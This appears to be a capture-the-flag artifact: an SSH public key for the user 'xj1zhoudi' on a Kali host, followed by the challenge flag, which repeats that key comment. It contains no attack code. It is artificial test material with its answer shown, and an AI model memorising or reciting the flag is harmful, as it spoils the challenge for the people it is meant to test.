ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDI9tXK9FEwdDP+Uv3TWyPERZpuzFaVQv6zxJ6VclzmZVBR/ZDp8T6iWBKkVfw5+3yBkYY0XKH3TejmsapMRO0kCgEXh5H5bYhQHM3PElBGTFuVDLaqOEPk6hWKlK4AbMuhS/sKjC7HUjN1lYPe1iUXwP8EkrxP91cCREiw93XWheCOazM4jk8wxgAjA5DDxobtUMwzFjomFVauyW0I/adf0kTB//DQcbUyr3bSvQtoVteJTnVC9n/1u7O9AcQZYZwfsGsYa7eqzI1i4GUG28wAQZcwnHPIsDvkLhWyqXpRPfpzJ3CK3XZ2y2ZUMTAvoI8EwL/SWNddcpZCU013QNKmkGDAiuYDdPV3fTw0fLf88CWsW39xeTEPxpgbJgHI3x4/meRqOCxps2I2eTkGsXSo5gTUmxMVObHrRXI2HcnlEx3fGtVRLAqHRcnEUch5+W7o/nCzohd7djFrbW+ztcqYJU4grXC6YHVwmyNmGhJkbho/PeK7qPW+treYzM5pC9IznvqRJfxTwvNi3WUT3Y6hK3SCLk57Pq/9/vEa7XNxHvclWkGR24aI9NH5JvlVO09bI4IezfRRQDmHObIVYvXmqTmwdUEhzcv2laVUeylmiNegnzqWQy3x8SQU6eNXEucsVwodbyPmfAbjpfGiXVQC9sclxE6TrHUIvOGYKUm1hQ== xj1zhoudi@kali

flag{xj1zhoudi@kali}